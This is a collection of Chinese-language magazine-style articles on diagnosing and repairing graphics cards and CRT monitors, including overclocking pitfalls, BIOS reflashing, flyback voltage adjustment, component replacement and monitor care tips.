    现在让我们回到先前的那个例子上去。我那位朋友的微星6309主板用的是免跳线技术，当CPU外频低于100MHz时，AGP显卡自动工作在1/1分频下。而他用的CⅡ 566 CPU的核心电压是1.5V，上不了100MHz外频，但在95MHz外频下，可使CPU很稳定地在800MHz（95MHz×8.5）的主频下工作，于是该机便自动工作在95MHz外频下──也就是说他的显卡一直在95MHz外频下工作，大大超过66MHz的标准频率。由于丽台显卡做工不错，没有像某些杂牌显卡那样立刻出现死机甚至黑屏的情况，让我那位朋友高高兴兴地超着用；但时间一长，再好的显卡也会受不了，最后导致显卡被烧坏。
    因此，诸位“超哥超妹”们，尤其是机器快出质保期和已经出了质保期的DIYer们，超频时，一定要注意你们的AGP显卡的工作频率；而那些想买包超CPU的DIYer们也请你们注意那些所谓的能超到多少多少MHz的CPU是否工作在标准外频下，否则，后果难料。


电脑综合诊治之显卡故障详解

《一键清理系统垃圾》

电脑综合诊治之显卡故障详解

一、开机无显示

    由于显卡原因出现此类故障一般是因为显卡与主板接触不良或主板插槽有问题造成，对其予以清洁即可。对于一些集成显卡的主板，唯有将主板上的显卡禁止方可使用。由于显卡原因造成的开机无显示故障，主机在开机后一般会发出一长两短的蜂鸣声（针对AWARD BIOS而言）。

二、显示颜色不正常

    此类故障一般有以下原因：1、显示卡与显示器信号线接触不良；2、显示器原因；3、在某些软件里面颜色不正常，一般常见于老式机，在BIOS里面有一项校验颜色的选项将其开启即可；4、显卡损坏；5、显示器被磁化，此类现象一般是由于与有磁性的物体过近所致，磁化后还可能会引起显示画面偏转的现象。

三、死机

    出现此类故障一般多见于主板与显卡的不兼容或主板与显卡接触不良，还有一些个别的现象，由于显卡与其他扩展卡不兼容而造成死机现象。

四、windows98里面出现花屏，看不清字迹

    此类故障一般是由于显示器或显卡不支持高分辨率造成，花屏后我们可以切换启动模式到安全模式，然后再在win98里面进入显示设置，在16色状态下点选应用、确定按钮，重新启动计算机，再在win98正常模式下删掉显卡驱动程序重新启动计算机即可予以解决。我们也可以不进入安全模式，在DOS方式下，编辑system.ini文件，将display.drv=pnpdrver改为display.drv=vga.drv存盘退出，再在windows里更新驱动程序即可予以解决。

五、在windows里面出现文字，画面显示不完全

    对此可按上面花屏的方案予以解决，如若画面能够看清，只要删除显卡驱动程序，再重新启动计算机装入显卡驱动程序即可予以解决。

六、在windows里出现一些异常的竖线或不规则的小图案

    此类故障一般是由于显卡的显存出现问题或显卡与主板接触不良造成，需要清洁显卡金手指部位或更换显卡即可予以解决。

七、显卡驱动程序载入，运行一段时间后驱动程序又自动丢失

    此类故障一般是由于显卡质量不佳或显卡与主板不兼容，使得显卡温度太高，从而导致运行不稳定或出现死机现象，唯有更换显卡一途予以解决，还有一种比较特殊的现象，在以前能够载入显卡驱动程序，但以后在显卡驱动程序载入后，进入windows时出现死机现象，对此，我们可以更换别的型号的显卡在载入其驱动程序后，再插入以前的显卡即可予以解决，如若还不能解决此类故障，那就说明注册表有问题，对注册表恢复或重新安装操作系统即可。

八、在某些特定的软件里面出现花屏现象，如理德名片系统

    此类现象一般是由于软件版本太老不支持新式显卡，如理德名片系统一般要用9680或9685系列显卡。

九、开机启动时屏幕上有乱码

    此类故障一般是由于主板与显卡接触不良引起，可按《内存故障详解》一文对其清洁后即可予以解决问题。


电视/捕捉二合一卡特殊故障

《一键清理系统垃圾》

电视/捕捉二合一卡特殊故障

《中国电脑教育报》邱朱胜

    我在二手市场淘得一块电视/捕捉二合一卡（不知道是什么牌子的，使用BT878芯片），没有原装驱动程序，商家给我配的是同维电视卡的驱动程序，但可以正常使用。正常使用一段时间后，突然有一天收看不了电视了，麻烦也就因此而来……

    故障现象：

    工作界面打开后，没有图像和声音，但能正常捕捉摄像机输入的音频、视频。将连接电脑的电视天线接到电视机上信号很好，说明问题不在天线上。

    故障分析：

    凭以上现象，也许大家都会推断是电视卡的高频头坏了，我也有同感。为了发扬DIY的精神，决定自己试着修理。拆下电视卡，用放大镜仔细观察，没有发现焊点断裂之类的问题，用橡皮胶反复擦拭金手指后重新装上，故障依然。查看控制面板/系统属性/设备管理，没有发现任何资源冲突。重新安装了VIA的四合一补丁（我的主板是磐英3VB+，使用VIA芯片组）后，也不见好转。换高频头又找不到同型号的，只能将就着了。

    排除故障：

    有一天无意中进入BIOS设置，将PNP/PCI CONFIGURATION的PNP OS Installed项由YES改为NO，进入Windows 98后发现电视卡复活了，为了验证复活的原因，重新将CMOS设置复原，故障又出现了。可见，电视卡的即插即用兼容性并不很好，如果您也有同样的问题，不妨一试。


二手显示器维修“三板斧”

《一键清理系统垃圾》

二手显示器维修“三板斧”

    本人的一位朋友购有四十多台二手显示器，一年未过，损坏过半。因本人有过修理电视机的经历，被朋友拉去维修。经过两天的工作，得以下维修经验，戏称“三板斧”，并据此修好了90％的二手显示器。在此，特将这些经验奉献给各位。
    第一斧：换电容。这批低价二手显示器很大一部分故障表现为：屏幕抖动，边缘有锯齿现象，严重者无法看清字符。属典型的电源故障。开机箱，大部分可以看到电源滤波电容（电路板上个头最大的那个电容）顶部鼓起，用400V 150μF电解电容替换它，即可解决问题。
    第二斧：调电阻。显示故障表现为屏幕上下或左右滚动，有的表现为屏幕扭曲或花屏，并伴有蜂鸣声。原因是机子老化，场频或行频偏差太大，已超过机器自身的同步调整范围。开机箱，寻找标示为“H.HOLD”或“V.HOLD”的电阻，仔细调整就可解决问题。
    第三斧：调电压。显示故障表现为有电源高压（用手触屏幕可听到有放电声），但无字符显示。一般情况是显像管老化，发射电子能力下降所致。开机箱，找到高压包（电路板上最粗、最大的黑家伙），注意其上有两个可调旋钮，仔细找到标有“SCREEN”的旋钮，选对方向调整，显示器上即可出现字符，特别注意别把显示器调得太亮，否则会加速显像管的老化速度。另一个旋钮标有“FOCU”是调聚焦电压的，如有字符模糊现象，一调即可。
    二手显示器由于使用年代太长，元器件都已老化，所出现的问题大部分可以通过调整解决。对于大部件有问题者，则修复比较复杂，此处不再赘述；有的甚至没有维修的必要了。


方正显示器屏幕抖动和亮度不足故障的检修

《一键清理系统垃圾》

方正显示器屏幕抖动和亮度不足故障的检修

前些日子修过一台方正Aone 14英寸显示器。故障现象是屏幕亮度不足，将亮度和对比度旋钮调至最大，屏幕依然很暗，播放VCD时，场景就和黑夜中拍摄的一样。但却可以用超级解霸软件中的亮度调整功能，将画面亮度提升至基本正常的水平，同时，该显示器还伴有屏幕抖动的现象。从故障现象来看，亮度和对比度旋钮虽不能将屏幕亮度调至正常水平，但在旋转时，亮度和对比度会随之发生明显的变化，说明这两个电位器功能正常。那么导致这种现象的原因就极有可能是显像管的加速极电压不够所引起。一般维护人员的手中是没有显示器电路图的，如何去调整加速极电压呢？我们知道，显示器虽不同于电视机，但其基本电路结构还是差不多的。当我们打开显示器后盖时，就会发现与显像管相连的一个黑色的大零件，那就是高压包，在高压包的外侧有两个可调旋钮：一个是调整会聚电压，一个是调整加速极电压。当屏幕上字迹模糊不清时，可调整会聚电压旋钮，使字迹清晰；当亮度不足时，可通过加速极电压来调整。实际调整时，无须记忆旋钮的方向，可以先左右微调，同时注意观察屏幕的变化，然后朝自己需要的方向调整，直至满意为止。当然调整前，应先将亮度和对比度旋钮放至中间位置，以便以后在外部调整时，这两个旋钮有一定的余量。本例中，通过调整加速极电压，使亮度达到正常，同时也消除了因加速极电压不足，引起屏幕抖动的现象。不过需要注意的是在调整高压包旋钮的时候，不懂电器维修的朋友一定要注意安全。


废弃显卡还魂记

《一键清理系统垃圾》

废弃显卡还魂记

《中国电脑教育报》陈建华

    前几天在二手市场里闲逛，突然看见有人在卖MGA G200显卡的“尸体”，反正闲着无聊，就冲上去问了问，说是点不亮了，要的话20块钱拿走，嘿嘿！拿来研究一下也好，说不定能弄好呢。就算弄不好，拿来收藏也不错啊！

    回到家仔细观察此显卡，确定表面没有任何烧伤的痕迹，而且成色看起来非常新。不过我还是很仔细地把它清理了一遍，金手指也擦得亮亮的，然后插到我的主板上，按了一下Power键，爱机开始启动，但屏幕不亮……看到这种情况，维修经验丰富的DIYer可能会想到，当我们不小心把显卡BIOS刷坏时，电脑就是给我们这副脸色看的。估计是这个原因后，我打算先刷新一下BIOS试试看。先换上自己的MGA G400显卡启动电脑，到驱动之家（www.mydrivers.com）转了一圈，下载了MGA G200/G400/G450/G550显卡最新的BIOS及相关工具，解压缩出一大堆文件，其中有个pbioswin.exe，看起来是在Windows下升级BIOS用的，运行以后选择第一项可以在Windows下升级显卡的BIOS；选择第二项创建MGA紧急启动盘，这就是我需要的，插入一张干净的优质软盘，做了一张紧急启动盘，然后拿我的G400做试验，用这张软盘启动，过了大约20秒钟，完成了一系列的启动动作后，出乎我意料的没有开始自动刷新BIOS，而是出现了DOS提示符，用dir命令查看了一下软盘上的内容，运行了一下所有能执行的文件，都没什么效果。

    难道就这么放弃？当然不，我又看了看下载以后解压缩出来的那堆文件，看到有一个ubiosdos.exe，看起来像是用来在DOS下更新BIOS的，由于不知道刷新具体要用到哪些文件，我索性把所有文件都复制到了C盘根目录下，然后重新启动计算机，进入纯DOS模式，这时默认路径就是C：\，直接在DOS提示符下输入pbiosdos，回车后程序提示是否真的刷新，按Enter键继续，过了4~5秒钟，刷新完成，重新启动计算机，一切正常。

    知道了做法以后，换上了损坏的G200，启动后不停地按键盘上的F8键，估计够时间出现启动菜单了，按了下数字键5，回车，输入pbiosdos，按了几下回车，又等了一会儿，想想也该搞定了，就重新启动系统……激动人心的时刻出现了，屏幕不负所望地亮了起来，进入Windows 98，16色的……由于我原来装的就是MGA系列显卡驱动，所以重新启动了一次以后就正常了。

    最后提醒大家一句，当硬件出现问题时，请不要轻易给它们判死刑，多尝试几种修复的方法，也许会有意想不到的效果呦！


更改显示器刷新频率的代价

《一键清理系统垃圾》

更改显示器刷新频率的代价

    前一段时间，为了提高显示器的性能，我在显示参数设置中把自己的AcerView 33显示器的参数一级级地提高，型号从AcerView 33D、到AcerView 33DL、再到AcerView 34T，最后达到AcerView 34TL。在这个型号中，我那原来根本无法满屏的显示器，不但能满屏，而且可以在75MHz的刷新频率下使用800×600的分辨率。这对原来只能在60MHz下使用800×600的老AcerView33来说，性能确实有了很大的提高。但好景不长，用了还没几天，显示器就突然黑屏，没有了任何反应。无论怎样开关显示器，都没有高压轰击屏幕的“哧”声，伸手靠近屏幕，也没有了高压静电反应。
    我把所学过的物理知识逐一在脑海里过滤，得出一个结论：显示器的行扫描电路出问题了。关机，打开显示器后盖，首先找到行逆程脉冲变压器（高压包），在它的旁边有一只三极管（行输出管），它一般都是用螺钉固定在行逆程脉冲变压器的散热片上的。用万用表测三个管脚间的电阻值均为0，行输出管果然击穿了。焊下来一看，其型号是D2125，查查手册，知道可用D1555、D1556等行输出管代替，买回一只D1556，焊好，开机，一切正常。我赶紧把显示器型号改为原来的AcerView 33，既然能用，只好将就再用一段时间了。
    教训：显示器的设计、生产均有一定的标准，擅自改动型号及刷新频率，均会造成灾难性的后果。
    以上的修理方法适用于任何显示器或彩电，只要是黑屏、无高压静电反应，一般情况下都是由于行输出管被击穿而引起的，找同型号的元件替换即可。不过，在更换时，一定要注意安全，因为即使是刚断了电，行逆程脉冲变压器也还存在高压，万一碰上了，那种感觉让你一辈子都忘不了。


更换显存修显卡

《一键清理系统垃圾》

更换显存修显卡

《中国电脑教育报》崔新潮

    朋友开网吧有两年多了，他的电脑配件和耗材上开销很大。什么耳机、鼠标、键盘、网卡……都需要经常更换。至于过了保修期的东西，我们几个朋友就在一起试着修理。毕竟是自己经营，节约二字就尤为重要了。另外网吧的配件大多是成批购买，同样的东西坏掉后经常二合为一，拼凑成一个好的，倒也省了不少修理费用。

    这天有一块显卡坏了，其症状是一开机屏幕就出现不规则的花屏，但是电脑没有报警，而且继续运行进入了Windows 98，还可以听到启动声音，只不过桌面图像是破损的。之后查阅了一些资料，得知系统显示花屏是因为显存的损坏而造成。这时想起半年前就有一块同样的显卡坏掉（显示芯片烧掉了），由于当时没有办法修理又过了保修期，因此一直放着。今天又坏掉同样的显卡，两块显卡是同一品牌的同一型号产品，是不是可以拼凑成一块好的显卡呢？虽然这个想法源自于拼凑鼠标，但两者却截然不同。拼凑鼠标只需要有动手能力即可，而要修理显卡可不是那么简单的事情。这点我心里也明白，但仍然坚持要试一试，反正已经是死马了，即便失败也没有什么损失。

    找来一把电烙铁和一小节漆包线后随即开工。首先用漆包线穿过早先坏掉的那块显卡的显存引脚，然后两头拉紧并用电烙铁加温显存的引脚部分。烙铁将焊锡融化时，拉紧的漆包线就会将显存和电路板分开。同样的方法，将花屏显卡的显存取下（需用万用表测试出好坏）。接下来就是将好的显存焊到电路板上。这个可不是那么好做，后来我找到了一个小窍门。我也模拟显卡的制作过程，先在电路板上刷上一道焊锡，然后再焊就快多了。然后又仔细检查了一遍电路上有没有脱焊和短路的地方。如图中箭头所指的地方就是断开的连接点，我是用一小段漆包线将它连上的。最重要的时刻来了，插上显卡开机系统正常启动，花屏故障消失了！

    叮当点评：此方法只是激发您的动手能力，但同样也是非常危险的！没有相当的电子电路知识，千万不能效仿！


检修显示器花屏故障

《一键清理系统垃圾》

检修显示器花屏故障

故障现象：Duron 950MHz CPU、HY PC133 128MB内存、AGP 32MB显卡，杂牌15英寸显示器。近期常花屏，有时开机无显示。

    故障排除：按照先软后硬的原则，先用KV3000杀毒软件查毒，毫无发现。怀疑显卡驱动程序有问题，拿出驱动光盘重装显卡驱动，故障依旧。把显示分辨率设置为640×480还是不时花屏。至此，只有检查硬件了。打开机箱，开机启动，可以看到所有的风扇都在转动，排除了电源供电故障的可能。关机，拔下显卡和内存，用橡皮将“金手指”反复地擦拭，重新插好显卡和内存，还是不时花屏。将显卡替换到别的电脑上一切正常，排除了显卡故障的可能性。找来一块PCI显卡试用，故障没有出现。问题找到了，看来是出在AGP插槽上，仔细观察AGP插槽簧片没有发现有断脚、弯脚的现象。用手轻轻地拨动AGP插槽，明显感觉到插槽有些松动。卸下主板固定螺丝，把主板拿在手中翻看，发现AGP插槽背面有几处焊点已经脱焊。找来电烙铁重新焊好，故障排除。

    经验总结：此问题的出现多半是由于频繁地拆装显卡或是操作不当造成的。因此建议大家在安装各类板卡设备时，一定要多加小心，不可用蛮力。比如目前的CPU插槽都是零阻力设计，如果安装时很费力，那么肯定是存在针脚弯曲或位置不对等问题，此时应仔细检查，理性安装，这样才能保证设备不会因没安装好而损坏。


揭开显示器闪烁之谜

《一键清理系统垃圾》

揭开显示器闪烁之谜

    本人算是半个电脑发烧友，只要是做和电脑相关的事情，总是力求完美，所以我的电脑总是处于最佳状态。

    一日，爱机出了点问题，就是在开机时显示器会闪烁三下，而且闪烁的时候计算机完全停滞，硬盘也不读盘，虽然最后仍然可以进入系统，而且使用了一晚上没有任何问题。但是第二天起来还是觉得不对，于是再次开机，看看问题究竟出在哪里。

    看着显卡、主板信息一一跳过，来到操作系统启动画面，硬盘灯刚亮一下，显示器立刻闪烁，三下之后系统继续启动。问题似乎是在运行硬盘上的某个文件时引起的，于是在“开始”菜单里找了起来，看看有什么值得怀疑的软件，这时突然看到了PowerStrip，对了！由于我的显卡BIOS无法重写，所以我一直用PowerStrip超频显卡，会不会是它的问题？不管那么多了，先删了再说，三下五除二将它从系统中删除。重启计算机，问题仍然存在。怎么办？对了，试试安全模式，这么基本的常识都忘了！立刻重启电脑，进入“安全模式”（本文操作基于 Windows XP），这回好了，显示器没有闪烁，计算机也没有停滞，根据我的经验，八成是开机自启动的某个文件在作怪！于是按“Win+R”组合键打开“运行”窗口，输入“msconfig”，打开“系统配置实用程序”，然后在“启动”一栏下面看看有什么疑点，除了系统本身的文件之外，还有一个SoundMan（用过Realtek集成声卡的朋友一定很熟悉）、一个金山毒霸、一个Serv-U、还有3721的插件，这些都是快到桌面时才启动的，应该不会是它们的问题。再往下看，是“nwiz2”和“NvCpl.dll”，看来它们的嫌疑最大了！屏蔽之后重启计算机，问题真的解决了！

    作为一个电脑发烧友，绝对不能这样草草了事。于是决定找出问题的根源，经查阅资料得知，“Nwiz”是显卡向导，“NvCpl”是显卡快速调整，会不会是设置有问题？在系统桌面上找到一块“空地”，单击鼠标右键，在出现的菜单中依次选择“属性→设置→高级→GeForce4 MX 440”，这时，显示器又闪烁了，而且硬盘停滞了几秒钟，感觉和开机时一样，看来问题就出在这里！

    先看看第一项“设备选择”，有两个按钮，先按按再说，点击“检测显示屏的时候”，故障再次出现。再点击“Display Timing”，有三个选项，默认使用的是“自动检测”，对了！就是因为选择了自动检测，每次启动计算机时显卡都要检测显示器类型，导致屏幕闪烁并减慢开机速度，看看下面的选项，“通用计时公式”和“离散显示器计时”，选择“通用计时公式”。重新设置之后，把启动项恢复到初始状态，重启系统，问题彻底解决！

    叮当点评：驱动程序是操作系统与硬件之间进行沟通的桥梁，所以当计算机出现问题时，我们不妨先从驱动程序着手解决，这样可能会让大家少走不少弯路。另外，我们应该铭记一个道理，就是在遇到各种软硬件问题时，一定要刨根问底，把问题彻底弄清楚，敷衍了事的办事态度是不可取的。


解决显示器花屏问题

《一键清理系统垃圾》

解决显示器花屏问题

    现象：一日正在CS大战，显示屏突然变得五颜六色，出现“花屏”现象，持续一段时间后键盘被锁死，只能Reset了。这种现象在第一次出现之后，就经常出现，有时候干脆就直接死机。

    解决：“花屏”现象是通过显示器表现出来的，但是导致花屏的罪魁祸首通常不是显示器。主要原因有以下两种：

    1.显卡松动，关机后拔下显卡重新安插通常就可以解决问题。

    2.系统过热，包括CPU温度过高和显卡芯片温度过高。可在机箱中相应位置安装散热风扇，或者将机箱放在通风良好的地方。


解决显示器雪花故障

《一键清理系统垃圾》

解决显示器雪花故障

    我的爱机使用两年多来，一直没出现什么大毛病，可是最近为其升级，却带来了不小的麻烦。

    从前我用的是无名15英寸显示器，升级后买了一台Acer 17英寸显示器，而且加了一块TNT 2显卡组成双显示器。进入BIOS，设置从AGP显示卡启动，保存设置退出，启动Windows后发现15英寸显示器的图片居然出现雪花，而且越来越严重。莫非是BIOS有问题？上网找到最新BIOS文件，刷新后问题依旧。会不会是硬件出现了兼容性的问题？找来VIA最新4合1驱动安装，还是没用。我又把两台显示器调换显卡，还是15英寸显示器出现雪花，看来老显示器是出问题了。

    找来工具费九牛二虎之力拆开后机壳（广大读者的显示器如果没过保修期可不要学我，因为拆开就没有保修了，且显示器内有高压元件，盲目操作非常危险），用万用表细细检测一番，各个电路均工作正常，显示器内部并没有什么问题。再次开机观看，故障居然全好，我不禁暗自窃喜。

    好景不长，使用几天后，雪花再次出现，看来故障不容易对付。翻看各类书籍，发现有些显示器会有电磁干扰现象，用安装屏蔽罩的方法可以解决。唉，不管有没有干扰，试试再说吧，找来工具自己制作了一个简易的屏蔽照安装在机器上，开机故障依旧，我是没办法了，只好送到售后服务中心去修了。

    我拔下插头正要送修，无意间发现本来15针的显示器接口居然只剩下13个针，莫非……一不做，二不休，再次拆下后机壳，发现电缆内有14条电缆线（看来有一个针孔没用上），又仔细查看插头，终于发现有一根信号针被折断了，本查阅有关资料知道这根针为绿色显示的接地线，换一个插头后，故障灰飞烟灭，至今无事。

    总结：显示器出现雪花大都由于内部原因或电磁干扰引起。由于接口断针而出现的雪花并不常见，尤其是上述的接地线，机内静电无法排出，最终导致出现雪花。但打开机壳放出静电就会恢复正常，而且由于显示接口一般都有一到两个空位没有连线，致使检修时不被广大DIYer所注意，造成麻烦。最后提醒大家没有专业显示器知识不要随便拆开机壳。


巧修长城彩显无光故障

《一键清理系统垃圾》

巧修长城彩显无光故障

一台Wescom（长城）14英寸手调彩色显示器出现了无光故障。据机主说，该机使用四年来，一直使用正常，但在前些时慢慢出现了亮度偏暗的问题，将亮度调到最大的位置才能够看到很暗的图像，到后来慢慢就一点光也看不到了。
    将显示器后壳拆下后接上电脑主机开机，可听见阳极高压产生的轻微的“噼叭”声，说明行部分工作基本正常，看显像管颈部位，有较暗红色的光亮，说明灯丝工作基本正常。查亮度、对比度调节部分，工作正常，显像管加速极、聚焦极和三个视放输出电压，均在正常范围。这就很奇怪了，因为显像管发光的几个外部必备要素已基本具备，而这时显像管仍不能发光，唯一能解释的就是显像管因阴极老化造成束电流减小，从而引起了光暗甚至无光的故障。
    这样看来要彻底解决问题，只能更换一只新显像管才行，但这样做的成本太高，能不能不换显像管解决这个光暗的问题呢？笔者通过仔细地分析本机的有关电路发现：本机采用了大多数机器上的从行输出变压器引出的低压脉冲电流为显像管灯丝提供电源，为了抑制开机冲击电流对灯丝可能产生的损害，在显像管灯丝回路中串接了一只数十毫亨的电感，从原理上分析，电感对高频脉冲电流的阻碍比较大，能不能用一只大功率电阻代替这支电感既可加强灯丝供电又防止冲击电流对显像管灯丝的伤害，从而增大阴极的电子发射能力呢？我想应该是可行的，因为很多显示器就是采用的大功率小阻值电阻来完成限流作用的。于是断开显示器电源，用电烙铁焊下这支电感，买回一支0.5欧姆3瓦的水泥电阻焊在原电感的位置，开机，灯丝亮度没有明显变化，但荧光屏的光栅亮度业已恢复正常，亮度的可调范围与新机无异，经半年多的使用，一直工作正常。这次维修的成本仅区区三毛钱，如果大家也碰到类似问题，也不妨试试看。


如何令显示器长命百岁

《一键清理系统垃圾》

如何令显示器长命百岁

     在众多电脑配件中，使用寿命最长的部件就数显示器了。以笔者为例，我的电脑已升级多次，但是却一直留在我身边的是那台15英寸显示器。由于显示器在长时间使用中，容易受到包括温度、湿度、灰尘、电磁干扰、静电等环境因素的影响，造成不同程度的伤害或形成故障。因此，正确使用显示器，注意显示器的日常保养与维护，是决定其“长命”与否的重要因素。
    一、湿度不能太高和太低
    显示器使用环境的湿度应保持在30％～80％之间，一旦室内湿度高于80％，显示器内部就会产生结露现象。电源变压器和其它线圈受潮后也易产生漏电，时间一长甚至有可能霉断连线。另外显示器的高压部件在湿度过高的情况下也极易产生放电现象，机内元器件受潮容易生锈、腐蚀、严重时会使电路板发生短路。
    相反，当室内湿度≤30％时，则会使显示器机械摩擦部分产生静电干扰，内部元器件尤其是高压包被静电破坏的可能性增大，影响显示器正常工作，严重情况下还会造成使用人员受伤及显示器报废。
    因此，显示器的使用环境必须注意防潮，长时间不用的显示器，可以定期通电一段时间，让显示器工作时产生的热量将机内的潮气驱赶出去。同时，为了防止静电，建议将电脑接地，尤其是在北方气候干燥的环境下。
    二、控制室内温度
    显像管作为显示器的一大热源，在温度过高的环境下工作性能和使用寿命将会大打折扣，某些虚焊的焊点可能由于焊锡熔化脱落而造成开路，使显示器工作不稳定。同时元器件也会加速老化，轻则导致显示器“罢工”，重则可能击穿或烧毁其它元器件。
    因此，要在显示器摆放的周围留下足够的空间，让它“呼吸”。在炎热的夏季，如条件允许最好把显示器放置在有空调的房间中，或用电风扇吹。
    三、避免强光直照
     如果显示器受强光照射，时间长了容易加速显像管荧光粉的老化，降低发光效率（在强光照射环境下，面对显示器工作的人员，眼睛也极易受到屏幕反射光线伤害）。因此，用户不要把显示器摆放在日光照射较强的地方，最好是将显示器放在光线不能直接照射的地方或者将室内的光线调整柔和。
    四、防止灰尘
    由于显示器内的电压达10kV～30kV，极易吸引空气中的尘埃粒子，尤其是在开关机的刹那。大量的维修实践证明，灰尘对电脑的威胁是很明显的，在灰尘大的环境中工作，由于印刷电路板会吸附灰尘，灰尘的沉积将会影响电子元器件的热量散发，使得电路板上元器件的温度上升，产生漏电而烧坏元件。灰尘也可能吸收水分，腐蚀显示器内部的电子线路，造成一些莫名其妙的问题。所以灰尘虽体积小，但对显示器的危害是不可轻视的。
    为有效预防灰尘危害，确保显示器在相对干净的环境中使用，我们应该给显示器购买一个专用的防尘罩，每次用完后应及时用防尘罩罩上（注意不要在关机后立即罩上，因为显示器在关机后需要一定时间来散热）。同时，我们还应多做清洁，用柔软的干布小心地从屏幕中心，螺旋式地向外擦拭，不正确的擦拭方法会在屏幕上留下划痕，造成永久性伤害。另外千万不能用酒精之类的化学溶液擦拭、更不能用粗糙的布、纸之类的物品来擦拭显示屏，也不要将液体直接喷到屏幕上（注:一切清洁工作均须在拔掉电源线后进行）。
    五、避免磁场干扰
    电磁场干扰是指在电路或环境中出现了不该出现的电压电流。电磁干扰的来源主要有电源、元件、导线、接头、散热风扇、日光灯、雷电和静电放电等，以及电视机、电冰箱、电风扇等耗电量大的家用电器，如果它们距离显示器太近，天长日久这些器件便有可能对显示器产生电磁干扰。
    在使用中，我们应把显示器放在离其它电磁场较远的地方（最典型的例子是不要将PC音箱放得离显示器太近，即使是防磁音箱也要注意）。平时如有条件，可时常使用显示器上的消磁功能消磁。
    除了上述的注意事项，我们在实际使用中，还有许多细小的地方值得各位读者高度关注。其实显示器最大的破坏因素还在于使用者本身，我们的一些不良习惯对显示器的伤害远远大于环境因素对显示器的破坏。
    1. 不要在显示器上堆放杂物，以免影响显示器的正常散热加速元件老化。
    2. 在按动显示器面板上的功能旋钮时，要缓慢稳妥，不可猛转硬调，以防损坏旋钮。
    3. 显示器如线缆拉得过长，可能使显示器的亮度减小，且射线不能聚焦。
    4. 虽然显示器的工作电压的适应范围比较大，但也可能由于受到瞬时高压冲击而造成元件损坏，所以还是应使用带保险丝的插座。如条件许可，最好配一个UPS（不间断电源）。
    5. 使用中，可稍许降低显示亮度（适当），这样可以减缓显像管的荧光粉老化速度。
    6. 显示器的刷新率设置适当，不必使用太高的刷新频率，以延长显示器的使用寿命。
    7. 不要在显示器前吸烟，香烟中的焦油物质将会对显示器涂层有伤害。
    8. 不要经常开关机，开关机的高电压变动对显示器的寿命有很大影响。


电脑显示器的相关设置与常见故障排除方法

《一键清理系统垃圾》

电脑显示器的相关设置与常见故障排除方法

    一、如何达到最佳使用效果

    1.显示器刷新率的设置：刷新率即场频，指每秒钟重复绘制画面的次数，以hz为单位。刷新率越高，画面显示越稳定，闪烁感就越小。一般人的眼睛对于75hz以上的刷新率基本感觉不到闪烁，85hz以上则完全没有闪烁感，所以vesa国际视频协会将85hz逐行扫描制定为无闪烁标准。普通彩色电视机的刷新率只有50hz，目前电脑输出到显示器最低的刷新率是60hz，建议大家使用85hz的刷新率。

    2.显示器分辨率的设置：分辨率是定义画面解析度的标准，由每桢画面的像素数量决定。以水平显示的图像个数x水平扫描线数表示，如1024×768，表示一幅图像由1024×768个点组成。分辨率越高，显示的图像就越清晰，但这并不是说把分辨率设置的越高越好，因为显示器的分辨率最终是由显像管的尺寸和点距所决定的。建议使用以下分辨率/刷新率：14英寸和15英寸显示器，800×600/85hz；17英寸显示器，1024×768/85hz；19英寸及19英寸以上显示器，1280×1024/85hz。现在市场上的名牌显示器基本都能达到上述指标。

    3.显示色彩的设置：显示器可以显示无限种颜色，目前普通电脑的显卡可以显示32位真彩、24位真彩、16位增强色、256色。除256色外，大家可以根据自己的需要在显卡的允许范围之内随意选择。很多用户有一种错误概念，认为256色是最高级的选项，而实际上正好相反。256色是最低级的选项，它已不能满足彩色图像的显示需要。16位不是16种颜色，而是2的16次平方(256×256)种颜色，但256色就是256(2的8次平方)种颜色。所以16位色要比256色丰富得多。

    4.视频保护和休眠状态的设置：显示器是电脑设备里淘汰最慢的产品。5年前购买的14英寸彩显现在也可以使用，但如果谁还使用5年前的cpu、内存和硬盘等，那他一定是个收藏家。显示器的寿命主要取决于显像管的寿命。世界各大著名的显示器厂商所使用的显像管寿命相差无几，基本都在12000小时以内。用户的使用方法对显像管寿命有很大影响。所以建议大家设置显示器视保和休眠状态。一般进入视保时间为几分钟左右，进入休眠时间为10分钟左右。视保状态可以在你暂时不使用电脑时避免显像管被电子束灼伤。休眠状态可以在你长时间不使用电脑时自动关闭显示器。休眠状态的显示器只有cpu在工作，能耗只有通常状态下的5%左右，既延长显示器的使用时间又节约电能。

    注意以上4项设置都是在微机上进行的，在控制面板的显示器属性选项里进行设置，显示器本身不能进行以上设置。

    二、使用维护注意事项

    1.显示器的放置应尽量远离强磁场，如高压电线、音箱等，否则显像管容易被磁化。

    2.使用时尽量将显示器面向东方，因显示器出厂调整是面向东方进行的，这样可以使显示器受地球磁场的影响最小。

    3.应尽量避免灰尘进入，但在使用时不能用物品将显示器遮盖，否则热量散发不出去，导致显示器内部温升过高而损坏机器。

    4.避免阳光直射屏幕，否则容易使显像管老化。

    5.对比度可设置为最大，但亮度最好设置为最大值的70%～70%，亮度太高对眼睛不利，且缩短显示器的使用寿命。

    6.清洁屏幕：只能用柔软的干棉布擦拭屏幕的灰尘，注意不要使用硬质物品，也不能沾水或清洁剂擦拭，否则会损坏屏幕表面的防辐射及抗静电镀膜。

    7.清洁外壳：用棉布沾清水擦拭，不要使用任何清洁剂，否则会使外壳失去出厂时的特有光泽。

    三、简单故障处理

    1.屏幕无显示，前面板的指示闪烁：检查显示器与微机的信号线连接是否牢固，并检查信号线的接插口是否有插针折断、弯曲。

    2.显示形状失真的校正：现今的显示器都是数字控制，用户可以通过控制选单进行倾斜、梯形、线形、幅度等校正。高档次显示器可以进行聚焦、汇聚、色彩等校正。

    3.屏幕黑屏并显示“信号超出同步范围”(以三星显示器为例，各种品牌显示的内容不同)：当微机发出的信号超出显示器的显示范围，显示器检测到异常信号停止工作。用户可以先关闭显示器，再打开，然后重新设置微机的输出频率。

    4.关机时屏幕中心有亮点：应立即送维修中心修理。这种现象是由于显示器电路或显像管本身问题造成的，虽然当时不影响使用，但时间一长，显像管被灼伤，中央出现黑斑，此时再修理，保修期已过，用户利益受到损失。

    5.屏幕显示有杂色：通过显示器的前面板的消磁控制功能进行消磁，但不要在半小时内重复消磁。

    6.色彩种类不能上到32位：显卡问题，检查显卡是否具有此项性能及显卡的驱动程序是否安装。

    7.分辨率/刷新率上不去：多数情况下是使用问题。先检查显卡及显示器的驱动程序是否已安装(如果厂家提供的话)，然后根据使用说明书检查显卡及显示器是否可以达到你所要求的性能。如果一切正常，那就是显示器故障，只能联系维修中心解决。


三星500MP显示器故障维修实例

《一键清理系统垃圾》

三星500MP显示器故障维修实例

